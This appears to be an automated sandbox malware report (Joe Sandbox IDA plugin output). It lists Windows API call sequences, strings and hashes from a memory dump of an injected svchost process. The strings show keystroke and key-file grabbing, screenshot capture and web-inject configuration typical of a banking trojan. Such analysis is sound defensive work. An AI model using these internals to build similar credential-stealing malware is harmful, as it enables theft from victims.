                                                                                                                                                                                                            • Instruction Fuzzy Hash: 036178309406855FDB22DB249CA8BFBBBE9AF85304F5086D8E989D7150DB70DA89CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C81130: memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                              • Part of subcall function 02C81130: GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                              • Part of subcall function 02C81130: GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                              • Part of subcall function 02C81130: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD858,?,?), ref: 02C81206
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02C81234
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,?), ref: 02C81248
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C81259
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8125F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C81268
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C81279
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C81283
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,keygrab), ref: 02C81295
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C812A0
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C812A6
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C812AE
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C812BF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C812C6
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C812D3
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C81303
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD858,?), ref: 02C81323
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                            • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                            • API String ID: 2122597915-4222822809
                                                                                                                                                                                                            • Opcode ID: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                            • Instruction ID: f38ad4d4ce2a83df3e94e43d01db13399269dc43d253f1200e0522f9340ea6d4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9531C2759402599BDB11EBB4DC48BDA77BCEF88305F088A94E589C3000DFB0DA96CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD840,00000000,00000000,75449E60,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C80250
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802B8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802BF
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8033F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C80359
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C80373
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8038D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C803B7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02C803D4
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C803DB
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C80504
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8053C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8053F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8054C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8054F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD840,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C8055A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                            • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                            • API String ID: 2387113551-2328515424
                                                                                                                                                                                                            • Opcode ID: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                            • Instruction ID: 862d923f2d4cfc4ddbe5a02576eeefa2444832840683b132483696eb5dc3c8e8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BA1E2719447419FDB22DF34C8947A6BFE5AF85308F14C6ACD88A8B242EB71D60DCB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354), ref: 02C8D284
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354,?,?), ref: 02C8D389
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D3C3
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D3CD
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D3D5
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D3E4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D3EB
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Error$LastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Mode
                                                                                                                                                                                                            • String ID: .txt$.zip$6D1DA354$keys$path
                                                                                                                                                                                                            • API String ID: 3293890905-2325907159
                                                                                                                                                                                                            • Opcode ID: e3d100074f92705510d1429fcbc914268e46e4abc397a2cd9195c4c0cc4227d6
                                                                                                                                                                                                            • Instruction ID: aee6f32301bdcdfa9a6d4cc34bc4f8d0ee578be413322cb3f489d5fcad6d9f42
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3d100074f92705510d1429fcbc914268e46e4abc397a2cd9195c4c0cc4227d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB81E9315086868FC716DB3894687ABBBE5EFC5349F18CA58E8CAD7241EB31D509C781
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C89C00
                                                                                                                                                                                                              • Part of subcall function 02C89B20: PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89B47
                                                                                                                                                                                                              • Part of subcall function 02C89B20: GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                              • Part of subcall function 02C89B20: PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89C48
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C89CB0
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C89CBD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380,?,?), ref: 02C89CF7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C89D7A
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C89D8E
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C89DA1
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02C89DD0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA380), ref: 02C89DDB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89DFE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C89E01
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89E0E
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C89E11
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 5NT$6D1DA380$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 2685098104-1683899619
                                                                                                                                                                                                            • Opcode ID: c76f9a911eba22ee1312f3e01cc86fb43b923aab6fb7c8ea42aaa922a96ca9e6
                                                                                                                                                                                                            • Instruction ID: c06213b1eed9abbb4c11ff5360907248da8ade7d6854d3c723d800ba307d5478
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c76f9a911eba22ee1312f3e01cc86fb43b923aab6fb7c8ea42aaa922a96ca9e6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06517931A406855FDB129B389C98BF6BFE89F81308F1485E5E986DB341EB719948CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(02C7136E,\java\,?,75495180,00000000,?,?,02C7136E,?,?), ref: 02C8E959
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(02C7136E,\windows\,?,?,02C7136E,?,?), ref: 02C8E969
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E97C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,?,?,02C7136E,?,?), ref: 02C8E998
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8E99F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8E9AF
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E9CF
                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02C8E9E4
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(?,?,?,?,02C7136E,?,?), ref: 02C8EA05
                                                                                                                                                                                                            • ReadFile.KERNEL32 ref: 02C8EA32
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75495180,00000000,?,?,02C7136E,?,?), ref: 02C8EA8E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAA1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAA4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAB1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAB4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$ByteCharMultiWide$AllocFreeNamePathPointerReadShortSizeValidatememset
                                                                                                                                                                                                            • String ID: \java\$\windows\$iBKS
                                                                                                                                                                                                            • API String ID: 3070551764-2513530025
                                                                                                                                                                                                            • Opcode ID: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                            • Instruction ID: ff8bf14a6dcb9fd73a4fdef842a0580c8f30e8ec5885aa7bb6a116afd196ec38
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5041C471A843616BE721AF259C48FBB7AACFFC4F19F048618F814D71C0EB70DA0586A1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82160
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C821A8
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,id=,user!965543!09C06683), ref: 02C821BE
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02C821C6
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000,?,id=,user!965543!09C06683), ref: 02C821CD
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!965543!09C06683), ref: 02C821EF
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!965543!09C06683), ref: 02C821F6
                                                                                                                                                                                                              • Part of subcall function 02C82030: memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                              • Part of subcall function 02C82030: GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                              • Part of subcall function 02C82030: SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                              • Part of subcall function 02C82030: _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                              • Part of subcall function 02C82030: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                              • Part of subcall function 02C82030: WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,75569300), ref: 02C820FB
                                                                                                                                                                                                              • Part of subcall function 02C82030: GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                              • Part of subcall function 02C82030: CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!965543!09C06683), ref: 02C8223F
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!965543!09C06683), ref: 02C82246
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Drive$Type$CurrentFileHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLogicalModePriorityStringsWrite_snprintf
                                                                                                                                                                                                            • String ID: AppEvents$Console$Control Panel$Environment$user!965543!09C06683$Identities$Software$System$id=
                                                                                                                                                                                                            • API String ID: 3198928771-1118685808
                                                                                                                                                                                                            • Opcode ID: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                            • Instruction ID: 21637d07351c62209abd453d13aea30da296579d93d7853852444d9999779526
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E31F6B1980294AFD712EFE49C4D79EBB69EF8031CF904698ED08A7140D7704E55CF96
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA3E6), ref: 02C8B127
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B175
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B181
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B185
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B196
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B19D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C8B1D0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B1DF
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8B1E5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8B1E9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B1FA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8B201
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8B22F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C8B245
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6D1DA3E6$scrs
                                                                                                                                                                                                            • API String ID: 1455050916-1868188365
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da03d), ref: 02C90147
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90195
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C901A1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C901A5
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C901B6
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C901BD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C901F0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C901FF
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90205
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C90209
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9021A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C90221
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C9024F
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02C90265
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$6d1da03d$scrs
                                                                                                                                                                                                            • API String ID: 1455050916-4206254920
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0CC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8E0E2
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0F0
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E0F9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E117
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E125
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8DCE0,00000000,00000000,00000000), ref: 02C8E13A
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C8E14B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8E150
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E164
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E172
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA), ref: 02C8E17D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA2CA,FAKTURA), ref: 02C8E197
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6D1DA2CA$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Wu
                                                                                                                                                                                                            • API String ID: 2736094147-773477533
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FEFC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8FF12
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FF20
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8FF29
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF47
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8FF55
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8FC70,00000000,00000000,00000000), ref: 02C8FF6A
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02C8FF7B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8FF80
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF94
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8FFA2
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA), ref: 02C8FFAD
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA0AA,INTER), ref: 02C8FFC7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: 6D1DA0AA$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 2736094147-763215909
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7738C
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C77393
                                                                                                                                                                                                            • SetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C7739F
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                              • Part of subcall function 02C7CAA0: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
